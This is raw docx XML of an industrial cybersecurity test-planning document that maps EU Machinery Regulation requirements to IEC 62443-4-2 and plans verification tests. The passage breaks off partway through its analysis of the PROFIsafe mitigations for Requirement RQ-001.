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2D1D2" w14:textId="5E280C3F" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2808542F" w14:textId="27AE20AB" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Requirement &amp; Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="004C79A4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">apping from the EU Machinery Regulation to the IEC 62443-4-2 Component Requirement (CR). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62926251" w14:textId="346AFD24" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Assets &amp; STRIDE: Evaluate identified Target Assets and </w:t>
      </w:r>
      <w:r w:rsidR="00196EB6" w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">threats. Are they plausible for this specific device and requirement? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D2B610" w14:textId="13EFF358" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Functions &amp; Gaps: Cross-reference my Security Functions and Gaps with the device documentation. Are the mitigations accurately described? Are the identified gaps realistic? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F4839" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A28653" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D081344" w14:textId="03DEEB92" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Based on the validated Security Functions and Gaps, derive concrete test scenarios to verify the mitigations or prove the gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D7EDF1" w14:textId="19FFF82A" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scientific Justification: Justify the chosen test methods using established technical guidelines (e.g., NIST SP 800-115 for network/port scanning, MITRE ATT&amp;CK for ICS for active exploitation/sniffing, or OWASP for the IoT-Core web interface).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD03960" w14:textId="0BE0189C" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IEC 62443-4-1 Categorization (SVV): Assign each test to the correct SVV category:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35F769" w14:textId="00B389C1" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SVV-1 (Requirements-based Testing): Verifying functional implementation in normal operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67614165" w14:textId="13CDE81E" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SVV-2 (Threat Mitigation Testing): Verifying the effectiveness of countermeasures under attack/fault conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1916C01F" w14:textId="255DB632" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SVV-3 (Vulnerability Testing): Searching for known vulnerabilities or open attack surface (e.g., Nmap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D5257A" w14:textId="465EB6F1" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SVV-4 (Penetration Testing): Active exploitation or protocol manipulation (e.g., Scapy, Fuzzing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440B8659" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092DD3AF" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3: Two-Level Test Catalog Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1EA1C3" w14:textId="77777777" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generate the final test catalog entries for the planned tests. Each test must be structured in two levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383090BB" w14:textId="3299928D" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1: Abstract Test Scenario (Product-neutral). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2D1613" w14:textId="489805BC" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294" w:rsidP="00901B8F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Must include: Test Case ID, Traceability (RQ -&gt; CR -&gt; Asset), Target Threat, SVV Category, Test Objective, Abstract Test Steps, and strict Pass/Fail Criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB49CF5" w14:textId="0B20E753" w:rsidR="00106294" w:rsidRPr="00106294" w:rsidRDefault="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2: Concrete Test Execution (Specific to my test environment). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CABC10" w14:textId="08570F75" w:rsidR="004117CC" w:rsidRDefault="00106294" w:rsidP="000B7BA2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106294">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Must include: Referenced Test Case ID, Hardware/Network Setup (Kali, Pi, Target IPs), Concrete Tools (Nmap, Wireshark, Scapy, etc.), Specific Commands/Scripts to be executed, and placeholders for the Result and Evidence (e.g., PCAP, XML logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3CAB71" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5AC76E" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE29558" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5BE3E1" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FF141D" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08246ECD" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46EEA15B" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9EA97B" w14:textId="77777777" w:rsidR="00586AD9" w:rsidRDefault="00586AD9" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FCED36" w14:textId="77777777" w:rsidR="00586AD9" w:rsidRDefault="00586AD9" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F478009" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26436A41" w14:textId="77777777" w:rsidR="0047270E" w:rsidRDefault="0047270E" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090CB1CC" w14:textId="0F7DE990" w:rsidR="00C1714F" w:rsidRPr="00F51953" w:rsidRDefault="00C1714F" w:rsidP="00F51953">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E8EAE" w14:textId="11848689" w:rsidR="00DB074F" w:rsidRPr="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
      <w:r w:rsidR="00FF7917">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical Review &amp; Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E48A09" w14:textId="3AD7AF1C" w:rsidR="00897779" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00897779" w:rsidRPr="00897779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48904F0A" w14:textId="28D8204D" w:rsidR="00897779" w:rsidRPr="00897779" w:rsidRDefault="00897779">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00897779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall be designed so that the connection of another device, including any remote device that communicates with it, does not lead to a hazardous situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63350F51" w14:textId="5BAC745A" w:rsidR="00897779" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00897779" w:rsidRPr="00897779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 3.</w:t>
      </w:r>
      <w:r w:rsidR="00D018FD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:r w:rsidR="00693D6E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 3.1 RE (1), CR 1.2 (secondary)</w:t>
      </w:r>
      <w:r w:rsidR="00EE7A74">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05998AB8" w14:textId="44528F03" w:rsidR="00897779" w:rsidRPr="00786FAD" w:rsidRDefault="007F5A7B" w:rsidP="00786FAD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00897779" w:rsidRPr="00897779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset A (Trusted Safety Function), </w:t>
      </w:r>
      <w:r w:rsidR="00786FAD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Asset C (Integrity/Authenticity of Safety-Relevant Process Data)</w:t>
      </w:r>
      <w:r w:rsidR="003C15FB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, (Asset E (Safety Monitoring)) </w:t>
      </w:r>
      <w:r w:rsidR="00897779" w:rsidRPr="00786FAD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Asset F (Domain Separation)</w:t>
      </w:r>
      <w:r w:rsidR="00F85E4C" w:rsidRPr="00786FAD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B64B8" w14:textId="2D3E4979" w:rsidR="00897779" w:rsidRPr="00280EAE" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00897779" w:rsidRPr="00280EAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spoofing, Tampering</w:t>
      </w:r>
      <w:r w:rsidR="00337CBF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2947BA5F" w14:textId="77777777" w:rsidR="005801D9" w:rsidRPr="00761122" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9AEE8" w14:textId="49F218AA" w:rsidR="00761122" w:rsidRPr="00761122" w:rsidRDefault="00761122" w:rsidP="00706D72">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Black-channel architecture</w:t>
      </w:r>
      <w:r w:rsidR="00785C21">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00706D72">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> COM (CPU3) is non-safety (QM) and only tunnels the FSCP frame; the safety logic and the PROFIsafe consumer run on the SCPU (SRIO categorisation, black-channel principle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77B5B2" w14:textId="57719855" w:rsidR="00761122" w:rsidRPr="00761122" w:rsidRDefault="00761122" w:rsidP="00706D72">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Consumer-ID / F_Dest_Add check</w:t>
      </w:r>
      <w:r w:rsidR="00785C21">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Under Address Type 1 the PROFIsafe CRC is seeded with the F-codename (incl. F_Dest_Add). A telegram destined for a different address therefore fails CRC at the real consumer (SRIO-7830, SRIO-10807, SRIO-15799).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47826F71" w14:textId="6231924D" w:rsidR="00761122" w:rsidRPr="00761122" w:rsidRDefault="00761122" w:rsidP="00706D72">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4-byte CRC + CRC-Seed24/32</w:t>
      </w:r>
      <w:r w:rsidR="00785C21">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detects accidental/most malicious payload modification of the cyclic frame (SRIO-2998).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA0C9A" w14:textId="5EE0C3B7" w:rsidR="00761122" w:rsidRPr="00761122" w:rsidRDefault="00761122" w:rsidP="00706D72">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">F_WD_Time watchdog + consecutive number </w:t>
      </w:r>
      <w:r w:rsidR="00785C21" w:rsidRPr="00785C21">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00761122">
